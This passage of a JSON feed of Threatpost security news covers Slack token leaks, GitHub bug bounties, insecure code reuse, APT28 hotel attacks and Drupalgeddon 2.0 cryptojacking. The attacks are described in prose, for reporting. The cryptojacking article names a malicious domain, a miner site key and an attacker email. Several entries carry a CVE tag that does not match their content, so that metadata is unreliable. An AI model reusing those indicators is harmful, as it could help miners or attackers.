and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232105/bitbucket.png>)\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another features, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. Instead developers can use third party-tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232101/github.png>)\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developers first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem at the bud is the used of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232050/nodejs.png>)The Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. According to Node.js the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program 